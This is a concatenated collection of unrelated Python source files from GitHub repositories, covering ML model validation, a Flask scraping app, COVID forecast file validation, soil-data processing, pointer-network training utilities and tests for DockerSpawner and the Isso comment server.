mv = ModelValidating(est, X_val, y_val, y_labels=y_labels, scaler=scaler_type)
if plot_cf:
mv.plot_confusion_matrix(savefig=savefig)
if clas_report:
report = mv.classification_report()
print(f"Classification Report: {est}\n{report}")
def get_n_best(estimators, X_val, y_val, y_labels, best_n=3, score="f1_score"):
"""Gets best estimators from list
Parameters
----------
estimators : list of estimators
list of trained estimators
X_val : ndarray
validation data
y_val : ndarray
validation labels
y_labels : {ndarray, sparse matrix}
decoded labels
best_n : int, default=3
number of estimators to pick
score : str, default="f1_score"
metric to use for picking best estimators ('accuracy'/'f1_score')
Returns
----------
best_est : list of estimators of len=´best_n´
"""
best_scores = []
for est in estimators:
mv = ModelValidating(est, X_val, y_val, y_labels=y_labels, scaler="")
indv_scores = mv.get_scores()
if score == "accuracy":
best_scores.append(indv_scores[0])
if score == "f1_score":
best_scores.append(indv_scores[1])
best_idx = np.argpartition(best_scores, -best_n)[-best_n:]
best_est = []
for index in best_idx:
best_est.append(estimators[index])
return best_est
def save(models, file_name=None, suffix=None):
"""Saves estimator
Parameters
----------
file_name : str, optional
name for the file if None model will be saved with suffix
suffix : str, optional
suffix to be added
"""
if file_name is None:
for model in models:
save_file(model, suffix=suffix)
else:
save_file(models, file_name=file_name)
def load(model_name):
"""Loads and returns pickle File
"""
return load_file(model_name)
``` |
{
"source": "jocelflores/web-scraping-challenge",
"score": 3
} |
#### File: Missions_to_Mars/.ipynb_checkpoints/app-checkpoint.py
```python
from flask import Flask, render_template, redirect
from flask_pymongo import PyMongo
import mars_scrape
# create flask and establish Mongo Connection
app = Flask(__name__)
mongo = PyMongo(app, uri="mongodb://localhost:27017/mars_app")
# create route to render index.html
@app.route("/")
def home():
# find dictionary and return
html_table = mongo.db.collection.find_one()
return render template('index.html', mars = html_facts)
@app.route("/scrape")
def scrape():
#run scrape function
mars_info = mars_scrape.scrape()
# update db
mongo.db.collection.update({}, mars_info, upsert=True)
return redirect("/")
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "JocelineLega/covid19-forecast-hub",
"score": 3
} |
#### File: code/validation/test-formatting.py
```python
from zoltpy.covid19 import validate_quantile_csv_file
import glob
from pprint import pprint
import sys
import os
import pandas as pd
import numpy as np
from datetime import datetime
import yaml
from itertools import chain
import collections
from validation_functions.metadata import check_for_metadata, get_metadata_model, output_duplicate_models
from validation_functions.forecast_filename import validate_forecast_file_name
from validation_functions.forecast_date import filename_match_forecast_date
def validate_forecast_file(filepath):
"""
purpose: Validates the forecast file with zoltpy
link: https://github.com/reichlab/zoltpy/blob/master/zoltpy/covid19.py
params:
* filepath: Full filepath of the forecast
"""
file_error = validate_quantile_csv_file(filepath)
if file_error != "no errors":
return True, file_error
else:
return False, file_error
def compile_output_errors(filepath, is_filename_error, filename_error_output, is_error, forecast_error_output,
is_date_error, forecast_date_output):
"""
purpose: update locally_validated_files.csv and remove deleted files
params:
* filepath: Full filepath of the forecast
* is_filename_error: Filename != file path (True/False)
* filename_error_output: Text output error filename != file path
* is_error: Forecast file has error (True/False)
* forecast_error_output: Text output forecast file error
* is_date_error: forecast_date error (True/False)
* forecast_date_output: Text output forecast_date error
"""
# Initialize output errors as list
output_error_text = []
# Iterate through params
error_bool = [is_filename_error, is_error, is_date_error]
error_text = [filename_error_output, forecast_error_output, forecast_date_output]
# Loop through all possible errors and add to final output
for i in range(len(error_bool)):
if error_bool[i]: # Error == True
output_error_text += error_text[i]
# Output errors if present as dict
# Output_error_text = list(chain.from_iterable(output_error_text))
return output_error_text
def update_checked_files(df, previous_checked, files_in_repository):
"""
purpose: update locally_validated_files.csv and remove deleted files
params:
* df: Pandas dataframe containing currently checked files
* previous_checked: Previously checked files as list
* files_in_repository: Current files in repo as list
"""
# Remove files that have been deleted from repo
# Files that are in verify checks but NOT in repository
deleted_files = np.setdiff1d(previous_checked, files_in_repository)
df = df[~df['file_path'].isin(deleted_files)]
# update previously checked files
df.to_csv('code/validation/locally_validated_files.csv', index=False)
def print_output_errors(output_errors, prefix=""):
"""
purpose: Print the final errors
params:
* output_errors: Dict with filepath as key and list of errors error as value
"""
# Output list of Errors
if len(output_errors) > 0:
for filename, errors in output_errors.items():
print("\n* ERROR IN ", filename)
for error in errors:
print(error)
print("\n✗ %s error found in %d file%s. Error details are above." % (prefix, len(output_errors) ,("s" if len(output_errors)>1 else "")))
else:
print("\n✓ no %s errors"% (prefix))
# Check forecast formatting
def check_formatting(my_path):
"""
purpose: Iterate through every forecast file and metadatadata
file and perform validation checks if haven't already.
link: https://github.com/reichlab/covid19-forecast-hub/wiki/Validation-Checks#current-validation-checks
params:
* my_path: string path to folder where forecasts are
"""
df = pd.read_csv('code/validation/validated_files.csv')
previous_checked = list(df['file_path'])
files_in_repository = []
output_errors = {}
meta_output_errors = {}
existing_metadata_name = collections.defaultdict(list)
existing_metadata_abbr = collections.defaultdict(list)
errors_exist = False # Keep track of errors
# Iterate through processed csvs
for path in glob.iglob(my_path + "**/**/", recursive=False):
# Check metadata file
is_metadata_error, metadata_error_output = check_for_metadata(path)
# Check metadata names and abbreviations for duplicates
model_name, model_abbr = get_metadata_model(path)
# Add checked model_name and model_abbr to list to keep track of duplicates
if model_name is not None:
existing_metadata_name[model_name].append(path)
if model_abbr is not None:
existing_metadata_abbr[model_abbr].append(path)
# Output metadata errors
if is_metadata_error:
meta_output_errors[path] = metadata_error_output
# Get filepath
forecast_file_path = os.path.basename(os.path.dirname(path))
# Iterate through forecast files to validate format
for filepath in glob.iglob(path + "*.csv", recursive=False):
files_in_repository += [filepath]
# Check if file has been edited since last checked
if filepath not in previous_checked:
# Validate forecast file name = forecast file path
is_filename_error, filename_error_output = validate_forecast_file_name(filepath, forecast_file_path)
# Validate forecast file formatting
is_error, forecast_error_output = validate_forecast_file(filepath)
# Validate forecast file date = forecast_date column
is_date_error, forecast_date_output = filename_match_forecast_date(filepath)
# Add to previously checked files
output_error_text = compile_output_errors(filepath,
is_filename_error, filename_error_output,
is_error, forecast_error_output,
is_date_error, forecast_date_output)
if output_error_text != []:
output_errors[filepath] = output_error_text
# Add validated file to locally_validated_files.csv
if len(output_errors) == 0:
current_time = datetime.now()
df = df.append({'file_path': filepath,
'validation_date': current_time}, ignore_index=True)
# Output duplicate model name or abbreviation metadata errors
output_errors = output_duplicate_models(existing_metadata_abbr, output_errors)
output_errors = output_duplicate_models(existing_metadata_name, output_errors)
# Update the locally_validated_files.csv
update_checked_files(df, previous_checked, files_in_repository)
# Error if necessary and print to console
print_output_errors(meta_output_errors, prefix='metadata')
print_output_errors(output_errors, prefix='data')
if len(meta_output_errors) + len(output_errors) > 0:
sys.exit("\n ERRORS FOUND EXITING BUILD...")
def main():
my_path = "./data-processed"
check_formatting(my_path)
if __name__ == "__main__":
main()
``` |
{
"source": "jocelitocastro/cm-m",
"score": 2
} |
#### File: cm-m/bin/3_gerar_arquivos_solo.py
```python
import sys, re, os, time
import numpy as np
import base_ptfs_module as soilhydros
import submodules as sm
import configparser
########## DEFINITIONS ##########----------##########----------##########----------
# Don't change these paths
project_name = sm.project_name()
map_path = os.path.join(sm.path_project, "Database", "Maps", "Vector")
soil_path = os.path.join(sm.path_project, "Database", "Soil")
soilgrids_path = os.path.join(soil_path, "soilgrids")
saida_atributos_solo = f"pontos_com_atributos_solo_{sm.project_name()}"
##########----------##########----------##########----------##########----------
def defineSoilFileName(df):
lat = df[0]
lon = df[1]
elev = df[2]
print(f"{lat:.2f}{lon:.2f}+{elev:.1f}m.sil")
return f"{lat:.2f}{lon:.2f}+{elev:.1f}m.sil"
def createSoilFiles(soil_attributes, centroides):
"""
This function aims to create the soil files to CropSyst, using the
array created previously with soilhydros.hodnett_tomasella_2002 module
Parameters
----------
soil_attributes : using soil_attributes array
DESCRIPTION.
Inputs --> theta_s[0], theta_fc[1], theta_pwp[2], Ksm[3], rho_s[4], Sa[5],
Si[6], Cl[7], pH[8], CEC[9], OM[10]
Returns
-------
None.
"""
soilAttributesDict = {'saturation': 0, 'field_capacity': 1, 'perm_wilt_point': 2,
'sat_hydraul_cond': 3, 'bulk_density': 4, 'sand': 5,
'silt': 6, 'clay': 7, 'pH': 8, 'cation_exchange_capacity': 9,
'organic_matter': 10}
file_standard = os.path.join(sm.path_project, "Database", "Format", "standard.sil")
standardParser = configparser.ConfigParser()
standardParser.read(file_standard, encoding='latin1')
for row in range(soil_attributes.shape[1]):
# print(row)
# soilFileName = defineSoilFileName(soil_attributes[0, row, :3])
soilFileName = f"{centroides.loc[row, 'gridcel']}.sil"
for depthId, depth in enumerate(soilhydros.soil_layers):
depthCS = str(depthId+1)
for keyParam in soilAttributesDict:
valueToUpdate = soil_attributes[depthId, row, soilAttributesDict[keyParam]+3]
standardParser.set(keyParam, depthCS, str(valueToUpdate))
if not os.path.exists(soil_path):
os.makedirs(soil_path)
# save to the final soil file format *.sil
with open(os.path.join(soil_path, soilFileName), 'w') as f:
standardParser.write(f, space_around_delimiters=False)
def main():
variaveis_soil_grids = ['bdod', 'cec', 'clay', 'phh2o', 'sand', 'soc']
# Load all soildgrids values (mean value)
shapefile_graticulate = sm.reading_soilgrids_attributes(project_name, map_path)
sm.saving_shape(shapefile_graticulate, "soil_attributes", map_path, project_name)
dataSoilAttributes = np.zeros((len(soilhydros.soil_layers), len(shapefile_graticulate),
len(variaveis_soil_grids)+3))
dataSoilAttributes[:, :, 0] = shapefile_graticulate['lat']
dataSoilAttributes[:, :, 1] = shapefile_graticulate['lon']
dataSoilAttributes[:, :, 2] = shapefile_graticulate['elevation']
for depthId in soilhydros.soil_layers_int.keys():
print(depthId)
for idx, indexVar in enumerate(variaveis_soil_grids):
# print(idx, "indexVar: ", indexVar)
variavel = f"{indexVar}_{depthId}"
dataSoilAttributes[depthId, :, idx+3] = shapefile_graticulate[variavel].values
# Salvando os atributos por pontos - formato padrão do SoilGrids
np.save(os.path.join(soilgrids_path, f"Atributos_solos_pontos_{project_name}.npy"), dataSoilAttributes)
# Carregando os atributos salvos - formato padrão do SoilGrids
# dataSoilAttributes = np.load(os.path.join(soilgrids_path, "{0}.npy".format(saida_solo)))
# Outputs --> alpha, n, theta_s, theta_r, theta_fc, theta_pwp, KsOttoni, Ks --> 8 columns
HodnettvG = np.zeros((len(soilhydros.soil_layers), len(dataSoilAttributes[0]), 14))
parametrosAjustados = np.zeros((len(soilhydros.soil_layers), len(dataSoilAttributes[0]), 9))
# ========================================================================
for depthId in soilhydros.soil_layers_int.keys():
# Positions for dataSoilAttributes: rho_s[3], CEC[4], Cl[5], pH[6], Sa[7], OC[8]
# Calculates the van Genuchten parameters, water contents based on Hodnett & Tomasella (2002)
# and Ks based on Ottoni et. al (2019)
HodnettvG[depthId, :, :3] = dataSoilAttributes[depthId, :, :3]
parametrosAjustados[depthId, :, :2] = dataSoilAttributes[depthId, :, :2]
# HodnettvG:
# Outputs --> lat[0], lon[1], elev[2], theta_s[3], theta_fc[4], theta_pwp[5],
# Ksm[6], rho_s[7], Sa[8], Si[9], Cl[10], pH[11], CEC[12], OM[13]
# ParametrosAjustados:
# Outputs --> alpha[2], n[3], theta_s[4], theta_330[5], theta_pwp[6], theta_r[7], Ks[8]
HodnettvG[depthId, :, 3:], parametrosAjustados[depthId, :, 2:] = soilhydros.hodnett_tomasella_2002(dataSoilAttributes[depthId, :, :])
# Salvando os parâmetros por pontos em todas as profundidades
np.save(os.path.join(soilgrids_path, f"pontos_com_atributos_solo_Hodnett_{project_name}.npy"), HodnettvG)
np.save(os.path.join(soilgrids_path, f"parametros_solos_ajustados_{project_name}.npy"), parametrosAjustados)
# Salvando todos os pontos na profundidade 0
#vGAdjustedParams = np.asarray([alpha, n, theta_s, theta_330, theta_pwp, theta_r, Ksm])
# HodnettvG = np.load(os.path.join(soilgrids_path, "{0}.npy".format(saida_atributos_solo)))
# parametrosAjustados = np.load(os.path.join(soilgrids_path, "parametros_ajustados_{0}.npy".format(saida_atributos_solo)))
createSoilFiles(HodnettvG, shapefile_graticulate)
if __name__ == '__main__':
if len(sys.argv) != 1:
print("[ ERROR ] This program needs no arguments")
sys.exit(1)
main()
```
#### File: cm-m/bin/submodules.py
```python
import os, re, glob
import geopandas as gpd
import pandas as pd
from rasterstats import zonal_stats
import platform
import pyproj
import yaml # to open and save crop information
#### PARAMETERS ####
# Defining the projection to the project
EPSG = 4326 # WGS84
# Defining CRS to extract soilgrids maps
crs = "http://www.opengis.net/def/crs/EPSG/0/152160"
# Defining Homolosine projection
crs_homolosine = pyproj.CRS("""PROJCS["Homolosine",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]],
PROJECTION["Interrupted_Goode_Homolosine"],
UNIT["Meter",1]]""")
# Resolução final das imagens do soilgrids (em graus)
soilgrids_res = 0.0024699875253998624
#### END OF PARAMETERS ####
path_project = os.path.dirname(os.getcwd())
def project_name():
if platform.system() != 'Linux':
return path_project.split('\\')[-1]
else:
return path_project.split('/')[-1]
def main_zonal_stats(grid, rasterfile, variavel, arredondamento):
stats = zonal_stats(grid, rasterfile, all_touched=True, stats="mean")
df = gpd.GeoDataFrame.from_dict(stats).round(arredondamento)
df.rename(columns={'mean': variavel}, inplace=True)
pointInPolys = pd.merge(grid, df, how='left', left_index=True, right_index=True)
return pointInPolys
def saving_shape(geodf, tipo, output_path, filename):
# Função para salvar o arquivo no formato shapefile
geodf.to_file(os.path.join(output_path, "{0}_{1}.shp".format(filename, tipo)))
def extract_graticulate_bounds(shapefile):
bounds = gpd.read_file(shapefile).to_crs(crs_homolosine).bounds
# Lower left corner
idx_minimum = bounds.minx.idxmin()
# bounds.minx.loc[idx_minimum]
# bounds.miny.loc[idx_minimum]
# Upper right corner
idx_maximum = bounds.maxx.idxmax()
# bounds.maxx.loc[idx_maximum]
# bounds.maxy.loc[idx_maximum]
return [('X', int(bounds.minx.loc[idx_minimum]), int(bounds.maxx.loc[idx_maximum])),
('Y', int(bounds.miny.loc[idx_minimum]), int(bounds.maxy.loc[idx_maximum]))]
def zonal_soilgrids(project_name, map_path, rasterfile):
# print("Opening polygons shapefile")
return zonal_stats(os.path.join(map_path, f"{project_name}_graticulate.shp"),
rasterfile, all_touched=True, stats="mean")
def reading_soilgrids_attributes(project_name, map_path):
files = glob.glob(os.path.join(path_project, 'Database', 'Soil', 'soilgrids', '*tif'))
polygons = gpd.GeoDataFrame(
gpd.read_file(os.path.join(map_path, f"{project_name}_graticulate.shp"), geometry='geometry'))
# Criando o padrão de expressão regular
patternVarName = re.compile(r"4326_([A-Za-z0-9]*)_([0-9-a-z_]*)cm")
conversao_soil_grids = {'bdod': 0.01, 'phh2o': 0.1, 'cec': 0.1,
'sand': 0.1, 'soc': 0.01, 'clay': 0.1}
depths = {"0-5": 0, "5-15": 1, "15-30": 2, "30-60": 3, "60-100": 4, "100-200": 5}
for n, file in enumerate(files):
# print(n, file)
reMatchVar = re.search(patternVarName, file)
select_depth = reMatchVar.group(2).split("cm")[0]
# print(select_depth)
variavel = reMatchVar.group(1)
# print(variavel)
var_header = f"{variavel}_{depths[select_depth]}"
print(f"Extracting: {variavel}_{select_depth}cm")
polygons[var_header] = 0.
stats_return = zonal_soilgrids(project_name, map_path, file)
for i, value in enumerate(stats_return):
converted_value = value['mean'] * conversao_soil_grids[variavel]
# print(i, converted_value)
# print(value['mean'], variavel, conversao_soil_grids[variavel], value['mean'] * conversao_soil_grids[variavel])
polygons.loc[i, var_header] = converted_value
return polygons
def openYamlFile(file_name):
with open(file_name, 'r') as f:
output_vars = yaml.safe_load(f)
return output_vars
``` |
{
"source": "JocelynBe/blog-post-pointer-networks",
"score": 2
} |
#### File: blog-post-pointer-networks/pointer-network/utils.py
```python
import os
import random
import string
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
import pytesseract
import shapely.geometry
import torch
from PIL import Image, ImageDraw
from sklearn.metrics import auc, precision_recall_curve
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader
from tqdm import tqdm
from model import Model
def OCR(image_path: str) -> List[Dict[str, Any]]:
image = Image.open(image_path)
image_data = pytesseract.image_to_data(image, output_type='data.frame')
image_data = image_data.loc[
image_data.text.apply(lambda x: pd.notnull(x) and x != '')
]
image_data['position'] = image_data.apply(
lambda row: [
int(row['left']),
int(row['top']),
int(row['left']) + int(row['width']),
int(row['top']) + int(row['height']),
],
axis=1,
)
return image_data[['text', 'position']].to_dict(orient='record')
def display_doc(doc: Dict[str, Any], predicted_tokens: Optional[List[int]] = None):
image = Image.open(doc['image_path'])
draw = ImageDraw.Draw(image)
if predicted_tokens is None:
subset_of_tokens = range(0, len(doc['OCR']))
else:
# -1 to account for the stop token
subset_of_tokens = [idx - 1 for idx in predicted_tokens if idx != 0]
for i in subset_of_tokens:
token = doc['OCR'][i]
draw.rectangle(token['position'], outline='blue')
draw.rectangle(doc['ground_truth'], outline='red', width=3)
return image
def ground_truth_match(
ocr_doc: List[Dict[str, Any]], ground_truth: List[float], threshold: float = 0.5
) -> List[int]:
ground_truth = shapely.geometry.box(*ground_truth)
labels = []
for (i, token) in enumerate(ocr_doc):
box = shapely.geometry.box(*token['position'])
match_score = ground_truth.intersection(box).area / box.area
if match_score > threshold:
labels.append(i + 1) # 0 is reserved for the padding / stop token
return labels
def seed_worker(worker_id):
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
def get_loaders(datasets, batch_size):
train_loader = DataLoader(
datasets['train'], batch_size=batch_size, worker_init_fn=seed_worker
)
val_loader = DataLoader(
datasets['validation'], batch_size=batch_size, worker_init_fn=seed_worker
)
test_loader = DataLoader(
datasets['test'], batch_size=batch_size, worker_init_fn=seed_worker
)
return train_loader, val_loader, test_loader
def text_pre_processing(text: str) -> str:
text = text.strip().lower()
text = ''.join([c for c in text if c in string.ascii_lowercase + string.digits])
return text
def pad_tensor(
tensor: torch.tensor, max_shape_0: int, max_shape_1: int
) -> torch.tensor:
new_tensor = torch.zeros(max_shape_0, max_shape_1)
a, b = tensor.shape
new_tensor[:a, :b] = tensor
return new_tensor
@dataclass
class Tensors:
keys: torch.tensor
words: torch.tensor
positions: torch.tensor
target: torch.tensor
def make_tensors(
dataset: List[Tuple[str, List[Tuple[List[int], List[float]]], List[int]]]
) -> Tensors:
list_keys, list_words, list_positions, list_targets = [], [], [], []
for key, input_data, target in dataset:
words = pad_sequence(
[torch.tensor(chars) for chars, position in input_data], batch_first=True
)
positions = torch.tensor([position for chars, position in input_data])
list_keys.append(int(key))
list_words.append(words)
list_positions.append(positions)
list_targets.append(torch.tensor(target + [0]))
shapes = [words.shape for words in list_words]
max_shape_0 = (
max([shape[0] for shape in shapes]) + 1
) # Adding a row so that the last row is
# always zero for consistency
max_shape_1 = max([shape[1] for shape in shapes]) + 1 # idem
tensor_words = torch.cat(
[
pad_tensor(words, max_shape_0, max_shape_1).unsqueeze(0)
for words in list_words
]
)
tensor_positions = torch.cat(
[
pad_tensor(positions, max_shape_0, 4).unsqueeze(0)
for positions in list_positions
]
)
tensor_target = pad_sequence(list_targets, batch_first=True)
return Tensors(
keys=torch.tensor(list_keys),
words=tensor_words,
positions=tensor_positions,
target=tensor_target,
)
def loss_function(
overall_probabilities: torch.tensor, target: torch.tensor
) -> torch.tensor:
batch_size, max_seq_len, n_tokens = overall_probabilities.shape
flat_target = target.reshape(-1)
flat_probabilities = overall_probabilities.reshape(-1, n_tokens)
loss = torch.nn.functional.cross_entropy(
flat_probabilities, flat_target, reduction='mean'
)
return loss
def get_val_loss(
model: Model, optimizer: torch.optim.Optimizer, val_loader: DataLoader
) -> float:
epoch_losses = []
for _, words, positions, target in val_loader:
overall_probabilities, peak_indices = model.forward(words, positions)
loss = loss_function(overall_probabilities, target)
optimizer.zero_grad()
epoch_losses.append(loss.item())
val_loss = np.mean(epoch_losses)
return val_loss
def train_model(
n_epochs: int,
model: Model,
optimizer: torch.optim.Optimizer,
train_loader: DataLoader,
val_loader: DataLoader,
) -> Tuple[List[float], List[float], List[float]]:
if not os.path.exists('models'):
os.mkdir('models')
train_losses, val_losses, validation_metrics = [], [], []
for epoch in range(n_epochs):
# Train
model.train()
epoch_losses = []
for _, words, positions, target in tqdm(train_loader):
overall_probabilities, peak_indices = model.forward(words, positions)
loss = loss_function(overall_probabilities, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
epoch_losses.append(loss.item())
train_loss = np.mean(epoch_losses)
train_losses.append(train_loss)
# Validation
model.eval()
val_loss = get_val_loss(model, optimizer, val_loader)
val_losses.append(val_loss)
val_threshold_data = get_threshold_data(model, optimizer, val_loader)
val_metrics = get_metrics(val_threshold_data)
validation_metrics.append(val_metrics)
print(
f'Epoch {epoch}, train_loss={train_loss}, val_loss={val_loss} \n val_metrics={val_metrics}'
)
torch.save(model, f'models/model_{epoch}.torch')
return train_losses, val_losses, validation_metrics
def get_threshold_data(
model: Model, optimizer: torch.optim.Optimizer, loader: DataLoader
) -> pd.DataFrame:
model.eval()
confidence_and_is_correct = []
for _, words, positions, target in loader:
overall_probabilities, peak_indices = model.forward(words, positions)
optimizer.zero_grad()
predicted_tokens = torch.argmax(overall_probabilities, 2)
prediction_confidence = (
overall_probabilities.exp().max(axis=2).values.min(axis=1).values.tolist()
)
prediction = np.array(
[
set(
single_prediction
) # We don't care about the ordering or repetitions
for single_prediction in predicted_tokens.tolist()
]
)
target = np.array(list(map(set, target.tolist())))
prediction_correct = prediction == target
confidence_and_is_correct += list(
zip(prediction_confidence, prediction_correct)
)
threshold_data = pd.DataFrame(confidence_and_is_correct)
threshold_data.columns = ['confidence', 'is_correct']
return threshold_data
def get_metrics(threshold_data: pd.DataFrame) -> Dict[str, float]:
accuracy = len(threshold_data.loc[threshold_data.is_correct]) / len(threshold_data)
precision, recall, thresholds = precision_recall_curve(
1 * threshold_data.is_correct.values, threshold_data.confidence.values
)
precision_recall_auc = auc(recall, precision)
return {'accuracy': accuracy, 'PR-AUC': precision_recall_auc}
def find_threshold(
target_accuracy: float, val_threshold_data: pd.DataFrame
) -> Tuple[List[float], List[float], float]:
thresholds = np.linspace(val_threshold_data.confidence.min(), 1, 100)
accuracies, automations = [], []
for th in thresholds:
tmp = val_threshold_data.loc[val_threshold_data.confidence >= th]
accuracy = tmp.is_correct.mean()
automation = len(tmp) / len(val_threshold_data)
accuracies.append(accuracy)
automations.append(automation)
threshold_99acc = min(
[th for th, acc in zip(thresholds, accuracies) if acc >= target_accuracy]
)
return accuracies, automations, threshold_99acc
def display_prediction(doc: Dict[str, Any], peaks: List[int]) -> Image.Image:
return display_doc(doc, predicted_tokens=peaks)
def set_seed(seed: int) -> None: # To ensure reproducibility
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(seed)
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
torch.set_deterministic(True)
torch.set_num_threads(1)
``` |
{
"source": "jocelynchen66/PUBG-Madglory-Project",
"score": 3
} |
#### File: pubg/test1/match_object.py
```python
import datetime
"""
Match objects contain information about a completed match such as the game mode
played, duration, and which players participated.
"""
class match_obj:
def __init__(self, data):
"""
data is the response from pubg api after sending get request using match object url
"""
self.id = data['data']['id']
self.createdAt = datetime.datetime.strptime(data['data']['attributes']['createdAt'], "%Y-%m-%dT%H:%M:%SZ")
self.duration = data['data']['attributes']['duration']
self.gameMode = data['data']['attributes']['gameMode']
self.mapName = data['data']['attributes']['mapName']
self.isCustomMatch = data['data']['attributes']['isCustomMatch']
self.seasonState = data['data']['attributes']['seasonState']
self.shardId = data['data']['attributes']['shardId']
self.asset_id = data['data']['relationships']['assets']['data'][0]['id']
self.included = data['included']
self.telemetry_url = ''
``` |
{
"source": "jocelyn/codeboard_mantra",
"score": 3
} |
#### File: Root/test/test1.py
```python
from Root import b
import unittest
class test1(unittest.TestCase):
def test_shuffle(self):
self.assertEqual(b.add(1,2),3)
def test_add(self):
self.assertEqual(b.add(4,2),6)
def test_addFail(self):
self.assertEqual(b.add(1,2),4)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JocelynDelalande/dockerspawner",
"score": 2
} |
#### File: dockerspawner/tests/test_systemuserspawner.py
```python
from getpass import getuser
from unittest import mock
import pytest
from jupyterhub.tests.test_api import add_user, api_request
from jupyterhub.tests.mocking import public_url
from jupyterhub.tests.utils import async_requests
from jupyterhub.utils import url_path_join
from dockerspawner import SystemUserSpawner
pytestmark = pytest.mark.usefixtures("systemuserspawner")
@pytest.fixture
def systemuserspawner(app):
"""Configure JupyterHub to use DockerSpawner"""
app.config.SwarmSpawner.prefix = "dockerspawner-test"
with mock.patch.dict(
app.tornado_settings, {"spawner_class": SystemUserSpawner}
):
yield
@pytest.mark.gen_test
def test_start_stop(app):
name = getuser()
add_user(app.db, app, name=name)
user = app.users[name]
assert isinstance(user.spawner, SystemUserSpawner)
token = user.new_api_token()
# start the server
r = yield api_request(app, "users", name, "server", method="post")
while r.status_code == 202:
# request again
r = yield api_request(app, "users", name, "server", method="post")
assert r.status_code == 201, r.text
url = url_path_join(public_url(app, user), "api/status")
r = yield async_requests.get(url, headers={"Authorization": "token %s" % token})
assert r.url == url
r.raise_for_status()
print(r.text)
assert "kernels" in r.json()
``` |
{
"source": "JocelynDelalande/isso",
"score": 2
} |
#### File: isso/specs/test_comments.py
```python
from __future__ import unicode_literals
import os
import json
import tempfile
import unittest
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
from werkzeug.wrappers import Response
from isso import Isso, core
from isso.utils import http
from isso.views import comments
from fixtures import curl, loads, FakeIP, JSONClient
http.curl = curl
class TestComments(unittest.TestCase):
def setUp(self):
fd, self.path = tempfile.mkstemp()
conf = core.Config.load(None)
conf.set("general", "dbpath", self.path)
conf.set("guard", "enabled", "off")
class App(Isso, core.Mixin):
pass
self.app = App(conf)
self.app.wsgi_app = FakeIP(self.app.wsgi_app, "192.168.1.1")
self.client = JSONClient(self.app, Response)
self.get = self.client.get
self.put = self.client.put
self.post = self.client.post
self.delete = self.client.delete
def tearDown(self):
os.unlink(self.path)
def testGet(self):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
r = self.get('/id/1')
assert r.status_code == 200
rv = loads(r.data)
assert rv['id'] == 1
assert rv['text'] == '<p>Lorem ipsum ...</p>'
def testCreate(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
assert rv.status_code == 201
assert any(filter(lambda header: header[0] == 'Set-Cookie', rv.headers))
rv = loads(rv.data)
assert rv["mode"] == 1
assert rv["text"] == '<p>Lorem ipsum ...</p>'
def textCreateWithNonAsciiText(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Здравствуй, мир!'}))
assert rv.status_code == 201
assert any(filter(lambda header: header[0] == 'Set-Cookie', rv.headers))
rv = loads(rv.data)
assert rv["mode"] == 1
assert rv["text"] == '<p>Здравствуй, мир!</p>'
def testCreateMultiple(self):
a = self.post('/new?uri=test', data=json.dumps({'text': '...'}))
b = self.post('/new?uri=test', data=json.dumps({'text': '...'}))
c = self.post('/new?uri=test', data=json.dumps({'text': '...'}))
assert loads(a.data)["id"] == 1
assert loads(b.data)["id"] == 2
assert loads(c.data)["id"] == 3
def testCreateAndGetMultiple(self):
for i in range(20):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Spam'}))
r = self.get('/?uri=%2Fpath%2F')
assert r.status_code == 200
rv = loads(r.data)
assert len(rv) == 20
def testCreateBlank(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': ''}))
assert rv.status_code == 400
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': "\n\n\n"}))
assert rv.status_code == 400
def testGetInvalid(self):
assert self.get('/?uri=%2Fpath%2F&id=123').status_code == 404
assert self.get('/?uri=%2Fpath%2Fspam%2F&id=123').status_code == 404
assert self.get('/?uri=?uri=%foo%2F').status_code == 404
def testUpdate(self):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
self.put('/id/1', data=json.dumps({
'text': 'Hello World', 'author': 'me', 'website': 'http://example.com/'}))
r = self.get('/id/1?plain=1')
assert r.status_code == 200
rv = loads(r.data)
assert rv['text'] == 'Hello World'
assert rv['author'] == 'me'
assert rv['website'] == 'http://example.com/'
assert 'modified' in rv
def testDelete(self):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
r = self.delete('/id/1')
assert r.status_code == 200
assert loads(r.data) == None
assert self.get('/id/1').status_code == 404
def testDeleteWithReference(self):
client = JSONClient(self.app, Response)
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'First'}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'First', 'parent': 1}))
r = client.delete('/id/1')
assert r.status_code == 200
assert loads(r.data)['mode'] == 4
assert '/path/' in self.app.db.threads
assert self.get('/?uri=%2Fpath%2F&id=1').status_code == 200
assert self.get('/?uri=%2Fpath%2F&id=2').status_code == 200
r = client.delete('/id/2')
assert self.get('/?uri=%2Fpath%2F').status_code == 404
assert '/path/' not in self.app.db.threads
def testDeleteWithMultipleReferences(self):
"""
[ comment 1 ]
|
--- [ comment 2, ref 1 ]
|
--- [ comment 3, ref 2 ]
|
--- [ comment 4, ref 2 ]
[ comment 5 ]
"""
client = JSONClient(self.app, Response)
